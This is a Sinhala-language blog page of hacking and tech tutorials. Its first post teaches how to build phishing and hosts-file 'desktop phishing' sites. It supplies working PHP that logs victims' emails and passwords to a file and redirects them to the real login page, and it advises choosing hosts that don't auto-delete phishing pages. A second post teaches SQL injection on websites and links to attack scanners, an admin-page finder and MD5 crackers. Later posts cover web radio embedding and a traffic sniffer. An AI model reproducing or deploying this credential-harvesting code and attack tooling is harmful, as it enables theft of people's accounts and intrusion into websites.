Phishing site / Desktop Phishing එකක් උපයෝහි කරගෙන password වලට ගේම දිම හා ඒවා වලින් ආරක්ෂා විම .

3

Share/Bookmark
අද නම් video එක කලේ හොදටම බිලා (අනේ වරදවා තෙරුම් ගන්න එපා ; හෙන බුදිමතේ !!!) :P තැන් දෙකක විතර හෙනම බුදිමතෙ කලේ. අද mic එකේ පොඩි අවුලක් තිබුන නිසා ( volume එක අඩුකරලා audio input වල ; නංගි ගොත පැටියගේ වැඩ තමා :P) සද්දේ අඩුවෙන් තමා record වෙලා තියන්නේ , පස්සේ තමා දැනගත්තේ volume එක අඩුකරලා කියලා audio input වල (අනේ මන්දා ඒ වෙලාවේ මැරෙන්න බුදිමත නිසා මුලින්ම audio testing පාරක්වත් දාන්න බැරිවුණා ; හපෝ මට ආයි video එකක් කරන්න තරම් ඇ‍ඟේ kick එකක් තිබ්බ නැති නිසා මම ආයි video එක කලේ නෑ [අයියෝ මට සමාව දෙත්වා !!!]). හරි හරි අවුලක් නෑ , video 2 කම බලලා කොමෙන්ට් එකක් දාලම යන්නකෝ !!!

Video Part 1



Video Part 2



අවශ්‍ය PHP කේතය :


<?php
if (!($fp = fopen('password.txt', 'a'))) {
return;

}

fprintf($fp, "Email = %s Password = %s", $_POST["email"], $_POST["pass"]);
header("Location: [Real Login page URL ; the page URL that you want to redirect]");
exit;
?>



PHP Enable Web hosting :

www.t35.com
www.yourfreehosting.net
www.drivehq.com
www.esmartstart.com

more :  

* Note : සමහර වෙබ් hosting වල spider bots ලා ඉන්න පුලුවන් ස්වයංක්‍රියව phishing sites delete කරන , ඒක නිසා ටිකක් හොයලා බලලා hosting provider ව තෝරගන්න  [ උදා : 110mb.com , 000webhost.com , byethost.com ] .

 
Update : =========================================================================
Desktop Phishing




Video Part 1



Video Part 2



=========================================================================

Phishing  වලින් ආරක්ෂා විමට අනුගමනය කලයුතු පියවර 



* හැමවෙලාවෙම site එකේ URL එක ගැන සැලකිලිමත් වෙන්න.

* ඔබ  URL එක හෝ අදාල වෙබ් අඩ්වියක් හඳුනාගැනිමට අපහසු වුවහොත් පළමුව වැරදිසහගත username එකක් හා passowrd එකක් ලබාදෙන්න . මන්දයත් එවිට Phishing වෙබ් පි‍ටුවක් තිබුනහොත් එම දුන් වැරදි username එකක් හා passowrd ගෙන ඔබව අදාල ඇත්ත වෙබ් අඩවියට redirect කරනු ඇත .(මෙම ක්‍රමය සමහරවිට Desktop Phishing වලට අදාල නොවෙන්නට පුලුවන) .


* බොහෝවිට ජනප්‍රිය වෙබ් අඩවි වල Login Page එක SSL Encryption කර ඇත , එවිට එහි URL පටන්ගනුයේ "https" ලෙසය . එම නිසා නිතරම මෙම "https" සළකුණ ගැන අවධානයෙන් සිටිම වැදගත්ය ( * මෙම SSL ENCRYPTION ක්‍රියාවලිය සෑම වෙබ් අඩවියකම නොතිබේ ) .

* කවමදාවත් E - mail ලිපියක ඇති URL එකක් Click නොකරන්න . එම අදාල URL එක  Address bar එකට පිටපත් කරගෙන අදාල වෙබ් පි‍ටුවට පිවිසෙන්න .

* කවමදාවත් නොදන්න වෙබ් අඩවි වලට තමන්ගේ Debit / Credit වැනි Card වල ping  numbers නොදෙන්න .

* නොදන්න අයගෙන් එන E - mail  වලට ප්‍රතිචාර නොදක්වන්න .

* සෑම විටම  වෙබ් ලිපිනය Address bar එකේ  ටයිප් කර හෝ Bookmark ආධාරයෙන් අදාල වෙබ් අඩවි වලට පිවිසෙන්න .


* ඔබ යන වෙබ් අඩ්වියේ Validate Certificate එක validate නතැයි කියා message එකක් පැමිණියේ නම් එවැනි වෙබ් අඩවිවලට නොපිවිසෙන්න .

* යම් කිසිහෙයකින් මා ඉහත පෙන්නු Desktop Phishing  විඩියෝවේ පෙන්වා ඇති පරිදි අදාල වෙබ් අඩවියේ Main / Login page එක පමණක් පැමිණ , එම අදාල වෙබ් අඩවියෙම අනෙකුත් වෙබ් ලිපින වලට  "URL not Found" හෝ "404 error" වැනි පණිවිඩ පැමියහොත් වහාම අදාල පරිඝණකයේ hosts file (Windows වල නම් තියන්නේ : C:\WINDOWS\system32\drivers\etc වල ; මේකෙන් කෙරෙන්නේ වෙබ් ඩොමේන් නාමයත් IP ලිපිනයත් මැප් කිරීමයි.) එකට  ගොස් 127.0.0.1 - localhost  එකට අමතරව IP ලිපිනයක් සමඟ වෙනත් වෙබ් අඩවියක් තිබෙනම් ඒ ගැන සැලකිලිමත් වි අදාල වෙනස්කම් නිවැරදි කොට යාවත්කාලින කරනලද Virus guard එකක් මඟින් වහාම මුලු පරිඝණයකම පරික්ෂාවට ලක් කරන්න .


* යම් කිසි මෘදුකාංගයක් ස්තාපනය කිරිමෙන් පසු එය යම් හෙයකින් virus යැයි ඇල්ලුවහොත් , වහාම ඉහත පියවරේ සඳහන් කල පරිදි hosts file එක පරික්ෂා කිරිම වඩා සුදුසුය .
ඉතිරිය කියවන්න .....>>

SQL Injection එක උපයෝගි කරගෙන වෙබ් අඩවියකට ගේම දිම (hack කිරිම) .

7

Share/Bookmark
පරන අටමගුල කරලා කරලා එපා වෙලා , ගොඩක් කට්ටිය අහපු නිසා ඔන් කලා ඒකටත් tutorial එකක් . අදත් කෙලියා තාප්පෙට උනානේ video එක record කරනකොට . (3 video එකේ අතරමගදි audio එක record වෙලා නෑනේ ; mic එකේ jack එක හෑලිලා :P) . ආ අමතක වුනානේ කියන්න ; video එක අර මොකක්ද කියනේ educational purposes ද මොකක්ද කියලා , අන්න ඒකට මේක අයිති හොදේ !!!

VIDEO PART 1



VIDEO PART 2




VIDEO PART 3



ඕනේ කරන මෘදුකාංග ටික :

*Virus Guard වලින් මේ ටික Trojan horse කියලා අල්ලනවා , ඒක නිසා මෙම මෘදුකාංග අත්හදා බැලිමේදි Deep Freeze , Virtual Box , Sand box වගේ එකක් තුල කරනවා නම් හොදා!!! , ඕන්න මම මුලින්ම නොකිව්වා කියන්න එපා ( කෙලකරගෙන මෙතැත මට බනින්නම් එපා හොදේ !!! :P .


*SQLI/XSS/LFI/RFI Scanner
(XSS Attacks  චෙක් කරන්නත් හොදා මේක ... :   
http://www.zarabyte.com/dl/exploitscanner.zip

*SQLI Helper V2.7 : 
http://www.zarabyte.com/dl/SQLIHelperV.2.7.rar
 

*Admin Page Finder :
http://www.zarabyte.com/dl/adminfinder.rar
 

=====================================================================


Online md5 decryption sites  : http://www.md5decrypter.co.uk/
http://md5crack.com/


update : කුසල් අයියගේ kuppiya.com එකේ තියලා සිංහලෙන් , SQL Attacks කොහොමද යවාගන්නේ කොහොමද කියලා තියන පොඩි video tutorial එකක් හම්බවුණා , ඕනේ අය ගිහිල්ලම බලන්නකෝ  >>  . 
http://kuppiya.com/download.php?pid=31
ඉතිරිය කියවන්න .....>>

තමන්ගේම radio broadcast (station) එකක් හදාගන්නේ කොහොමද ?

9
  • Apr 5, 2010
  • C0de BlUe
  • Labels:

  • Share/Bookmark
    හපොයි මේක මම කරන්න කාපු කට්ට . 4 සෑරයක් මේක කරන්න උනානේ . පළමු සෑරේ audio record වෙලා නෑ , 2 වෙනි සෑරේ බාගෙට rend වෙලා camstudio crash උනා , 3 වෙනි සෑරේ අකුණු ගහපු නිසා recording අතරමග නතර කරන්න උනා , ඊට පස්සේ තමා බොක්කටම මල පෑනලා 4 වෙනි video එක කළේ , ඒකත් අතරමහ කරන ගමන් මල පෑනලා කරපු නිසා සමහර තෑන්න වල වෑරදුනත් එක්ක (2 වෙනි video එකේ straem වෙන්න ඕනි තෑන් වල stream වුනේ නෑ , ඊළගට html එක ලියන කොට tag එක cloase කළේ නෑ , හපොයි ඔය වගේ පොඩි පොඩි විකාර ගොඩයි, අනේ ඒක නිසා මොනාහරි පොඩි පොඩි වෑරදි තිබ්බොත් ගණන් ගන්න එපා හොදේ :P [වෑඩේ කරගන්න ඕනේ කරන ඒවා ඔක්කොම හරියට දිලා තියනවා  :P ]). හරි හරි video එක බළලා ඉවරවෙලා කොමෙන්ට් එකක් දාලාම යන්නකෝ !!!!!

     Video Part 1



     Video Part 2



    අවශ්‍ය මෘදුකාංග : 1. Winamp : http://www.winamp.com/media-player/en
                                   2.Shoutcast plugin for Winamp :http://www.shoutcast.com/download

     Free Stream Service සෑපයිම : http://freestreamhosting.org

    වෙනත් තෑනක embed කිරිමට අවශ්‍ය කේතය :

    Flash Player :

    <script src="http://shoutcast.mixstream.net/js/flash/uk3-free:[your%20server%20port]" type="text/javascript">
    You appear to have javascript turned off.
    </script>
    

    Windows player :


    <embed style="visibility: visible;" type="application/x-mplayer2" pluginspage="http://microsoft.com/windows/mediaplayer/en/download/" id="mediaPlayer" name="mediaPlayer" displaysize="4" autosize="-1" bgcolor="darkblue" showcontrols="true" showtracker="-1" showdisplay="0" showstatusbar="-1" videoborder3d="-1" src="[your server Ip/host:your server port]" autostart="false" designtimesp="5311" loop="false" width="320" height="100">
    </embed>
                     
    
    

    හිතනවා මේ tutorial එක අවුලක් නෑ කියලා !!!! video එක අවුල් නම් මට බනින්න එපා හොදේ , අද මම ඕක කළේ හොඳටම මල පැනලා !!!!! :P
    ඉතිරිය කියවන්න .....>>

    URl getter භාවිතයෙන් ගින්නක් නැතුව ඕනැම audio , video file එකක් භාගත කරගැනිම

    4

    Share/Bookmark
    මම මේක ලියනවාද නැද්ද කියල්ල ඉදලා , ආයෙත් හිතුනා ගොඩක් අය මේක නොදන්න නිසා (* එහෙම හිතනවා  :P ) ලියන්න . මේ  ඩිංගීරි පැටියා මට හම්බවෙලා මාසයක් විතර ඇති , බැලුවා මේක ගැන youtube එකේ පොඩ්ඩක් , වැඩිය යමක් තිබුනේ නැති නිසා හිතුනා tutorial එකක් ලියන්න, පස්සේ හිතුණා කට්ටියට වැඩිය තේරෙන්නත් එක්ක video එකක් කරමුයි කියලා . ආ කියන්න අමතක වුනානේ ඩිංගීරි පැටියා  ගැන ... :D . ඩිංගීරි පැටියා තමා URL getter , මරු භාණ්ඩය කියන්නේ ඔත්තු බලලා files download කරන්න මරුගොයියා. මේකේ වැඩේ කියන්නේ බඩුව තියන්නේ නම් audio /video files වල url එක දැනගන්න ("Url Getter is a tool which get the streaming audio and video Urls, Many stream's Urls are hidden behind JavaScript or ActiveX scripts, so it is very difficult to get video and audio stream from social media websites." ) , නමුත් මේක යක් පැටියෙකුට හම්බවුනොත් කොහොමද?? ඔය වැඩේට අමතරව SSL Encrypted sites වල data sniff කරන්න , audio /video නොවන වෙන files වල path එක දැනගන්න , source code  එක encrypted කරලා තියන වෙලාවට එම source code  එකේ ඇති file එකක path එක දැනගන්න...... (වැඩ කෝටියයි නේ ...) නියම භාණ්ඩය . හරි හරි කතා ඇති ඔය පහත තියන විඩියෝ 2 ක බලලම කොමෙන්ට් එකක් දාන්නකෝ !!!!! :P

    Part 1



    Part 2 




    Download : http://www.urlgetter.com/download.htm

    =========================================================================

    Step by step instruction:
    Step 1: Download and install URL Getter
    Step 2: Run URL Getter, then click "Options" button, open "Options" windows.
    Step 3: Click the "Select ..." button, and open "Adpater list" window
    Step 4: Select the right adapter, and cick "OK" button
    Step 5: Return main window, and click "Start" button to sniff network data.
    Step 6: Open video's website, and play the video
    Step 7: Wait a second, you can get the video's address(URL) in the list.

    ඉතිරිය කියවන්න .....>>
    Related Posts with Thumbnails